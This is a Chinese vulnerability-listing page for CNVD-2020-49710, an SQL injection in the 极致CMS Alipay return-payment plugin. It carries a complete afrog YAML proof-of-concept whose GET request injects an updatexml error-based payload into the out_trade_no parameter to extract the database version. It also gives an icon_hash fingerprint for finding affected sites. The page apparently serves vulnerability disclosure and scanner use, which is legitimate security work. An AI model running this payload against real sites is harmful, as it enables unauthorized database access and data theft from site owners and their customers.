CNVD-2020-49710: 极致CMS alipay_return_pay SQL注入漏洞CNVD-2020-49710

日期: 2025-09-01 | 影响软件: 极致CMS alipay return pay | POC: 已公开

漏洞描述

极致CMS支付插件中存在SQL注入漏洞,通过漏洞可以获取数据库信息 icon_hash="1657387632"

PoC代码[已公开]

id: CNVD-2020-49710

info:
  name: 极致CMS alipay_return_pay SQL注入漏洞CNVD-2020-49710
  author: daffainfo
  severity: critical
  description: 极致CMS支付插件中存在SQL注入漏洞,通过漏洞可以获取数据库信息 icon_hash="1657387632"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E6%9E%81%E8%87%B4CMS%20alipay_return_pay%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /mypay/alipay_return_pay?out_trade_no=1%27 and updatexml(1,concat(0x7e,(select version()),0x7e),1)--+"
    expression: r"~(.*?)~".bmatches(response.body) && response.body.bcontains(b'XPATH syntax error:') && response.body.bcontains(b'jz_orders')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2020/CNVD-2020-49710.yaml

相关漏洞推荐